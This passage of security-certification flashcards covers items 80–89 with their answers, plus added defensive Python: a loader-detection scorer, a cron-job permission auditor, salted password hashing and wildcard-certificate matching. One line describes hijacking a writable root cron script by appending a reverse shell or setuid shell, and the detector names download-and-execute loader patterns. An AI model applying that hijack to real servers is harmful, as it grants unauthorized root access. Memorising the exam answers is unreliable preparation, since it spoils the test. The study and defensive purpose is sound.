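    out = OUTFILE_RE.search(command_line)
    if url and out:
        f.reasons.append("downloads a remote file to disk")
        if ext(url.group("url")) != ext(out.group("path")):
            f.reasons.append("URL extension differs from the saved extension")
        if TEMP_RE.search(out.group("path")):
            f.reasons.append("payload written to a temp directory")
        if ext(out.group("path")) in EXEC_EXTS:
            f.reasons.append("saved file has an executable extension")
    loader = LOADER_RE.search(command_line)
    if loader:
        f.reasons.append("invokes a living-off-the-land loader")
        # The downloaded path appearing after the loader name means the loader runs it.
        if out and command_line.lower().find(out.group("path").lower(), loader.end()) != -1:
            f.reasons.append("loader is pointed at the file that was just downloaded")
    return f


def triage(events, threshold=4):
    """Indices of events whose score reaches the (assumed) alerting threshold."""
    return [i for i, (_, _, cmd) in enumerate(events) if analyze(cmd).score >= threshold]
```

The benign MSI download in event 3 still picks up two traits (download to disk, temp directory), which is why the rule scores traits rather than alerting on any single one.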

80
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

A

A. Privilege escalation
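The check a tester (or a defender hardening the box) would automate here, as an added example that is not part of the original card: parse system-crontab entries in the format shown in the question (the extra user field is what distinguishes /etc/crontab from a per-user crontab) and report any script that runs as a privileged user from a location an unprivileged user can modify. The sample crontab and the throwaway directory tree are constructed by make_sample() for the example.

```python
import os
import stat
import tempfile

# Constructed system-crontab (minute hour dom month dow user command) mirroring the
# entry from the question; {writable} and {safe} are filled in by make_sample().
CRONTAB_TEMPLATE = """\
# m h dom mon dow user command
*/10 * * * * root {writable}/update.sh
0 3 * * * root {safe}/backup.sh
*/5 * * * * backup {writable}/rotate.sh
"""


def parse_system_crontab(text):
    """Yield (user, command) for each entry of an /etc/crontab-format table."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def audit(text):
    """Return (user, script, reason) tuples for entries a low-privileged user could hijack."""
    findings = []
    for user, command in parse_system_crontab(text):
        script = command.split()[0]
        if not os.path.isabs(script) or not os.path.isfile(script):
            continue
        st = os.stat(script)
        parent_st = os.stat(os.path.dirname(script))
        reasons = []
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("script is group- or world-writable")
        if parent_st.st_mode & stat.S_IWOTH and not parent_st.st_mode & stat.S_ISVTX:
            reasons.append("parent directory is world-writable and not sticky, so the script can be replaced")
        if user == "root" and st.st_uid != 0:
            reasons.append("runs as root but the script is owned by a non-root user")
        findings.extend((user, script, r) for r in reasons)
    return findings


def make_sample():
    """Build a throwaway tree with one hardened and one writable script directory and
    return the crontab text pointing at it (constructed data for the example)."""
    base = tempfile.mkdtemp(prefix="cronaudit-")
    safe = os.path.join(base, "opt-scripts")
    writable = os.path.join(base, "writable")
    for d, mode in ((safe, 0o755), (writable, 0o777)):
        os.mkdir(d)
        os.chmod(d, mode)          # explicit chmod so the umask does not interfere
    for path, mode in ((f"{safe}/backup.sh", 0o755),
                       (f"{writable}/update.sh", 0o777),
                       (f"{writable}/rotate.sh", 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")
        os.chmod(path, mode)
    return CRONTAB_TEMPLATE.format(writable=writable, safe=safe)
```

Either finding on update.sh is enough: a tester appends a reverse shell or a setuid copy of /bin/sh to the script and waits at most ten minutes for cron to run it as root.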

81
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

A

D. Data custodian

82
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team

A

A. White team

83
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.

A

D. Missing patches for third-party software on Windows workstations and servers.

84
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN

A

D. VPN

85
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs

A

A. The DNS logs

86
Q

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

A. .pfx
B. .csr
C. .pvk
D. .cer

A

D. .cer

A .cer file carries a certificate, which contains the public key and is safe to hand to anyone. A .pfx (PKCS#12) bundle and a .pvk file both contain the private key and must never be shared, and a .csr is a certificate signing request intended for a CA, not for a communication partner.

87
Q

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography

A

B. Salting

Salting is a technique used in password hashing where a random value (salt) is generated and appended to each password before hashing
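An added Python example, not part of the original card, showing why the salt defeats a rainbow table: unsalted SHA-256 of a common password is recovered with one dictionary lookup, while the same password hashed with a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 here) produces a different digest for every user and appears in no precomputed table. The "rainbow table" is a small constructed dictionary standing in for the real thing, and the iteration count is a work-factor parameter, not a fixed standard.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256; OWASP's 2023 guidance is in the 600,000 range.
ITERATIONS = 600_000


def unsalted_sha256_hex(password):
    """What a naive schema stores: sha256(password) with no salt."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return (salt, digest). A fresh 16-byte random salt is drawn unless one is given
    (verification passes the stored salt back in)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def verify_password(password, salt, digest, iterations=ITERATIONS):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


# Constructed stand-in for a rainbow table: a precomputed map from unsalted digests
# back to the passwords that produced them.
COMMON_PASSWORDS = ["password", "123456", "letmein", "qwerty"]
RAINBOW = {unsalted_sha256_hex(p): p for p in COMMON_PASSWORDS}


def lookup_unsalted(hex_digest):
    """The attacker's move against a plain-hash database: a single table lookup."""
    return RAINBOW.get(hex_digest)


def store_users(users, iterations=ITERATIONS):
    """Build a credential table {username: (salt, digest)} the way a database should hold it."""
    return {name: hash_password(pw, iterations=iterations) for name, pw in users.items()}
```

Because the salt is stored in the clear next to the digest, it adds no secrecy; its job is to make every precomputation attack start from scratch per user, and the iteration count makes each of those attempts slow.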

88
Q

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

  • www.company.com (main website)
  • contactus.company.com (for locating a nearby location)
  • quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN
B. Wildcard
C. Extended validation
D. Self-signed

A

B. Wildcard
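An added Python example, not part of the original card, of the name-matching rule that decides what a wildcard certificate actually covers, using the rules browsers and the CA/Browser Forum apply: the asterisk must be the entire leftmost label, it matches exactly one label, and it may not sit directly under a public suffix. The hostnames are those from the question plus a few constructed ones that show where the wildcard stops.

```python
def wildcard_matches(pattern, hostname):
    """Decide whether a certificate name (possibly '*.company.com') covers hostname."""
    p_labels = pattern.lower().rstrip(".").split(".")
    h_labels = hostname.lower().rstrip(".").split(".")
    if "*" not in pattern:
        return p_labels == h_labels
    if p_labels[0] != "*" or any("*" in label for label in p_labels[1:]):
        return False          # 'st*.company.com' or '*.*.company.com' are rejected
    if len(p_labels) < 3:
        return False          # '*.com' would cover every .com host
    if len(h_labels) != len(p_labels) or h_labels[0] == "":
        return False          # one label exactly: no apex, no deeper subdomains
    return h_labels[1:] == p_labels[1:]


def coverage(pattern, hostnames):
    """Map each hostname to whether the single certificate name covers it."""
    return {h: wildcard_matches(pattern, h) for h in hostnames}


# Constructed inputs: the question's hosts, the future store host, and three hosts
# a *.company.com certificate must NOT vouch for.
CANDIDATES = [
    "www.company.com", "contactus.company.com", "quotes.company.com", "store.company.com",
    "company.com", "dev.store.company.com", "www.company.com.attacker.net",
]
```

The apex company.com is not covered by *.company.com, so a deployment that also serves the bare domain lists both company.com and *.company.com as subject alternative names in the one certificate.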

89
Q

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

A. SFTP
B. AIS
C. Tor
D. IoC

A

C. Tor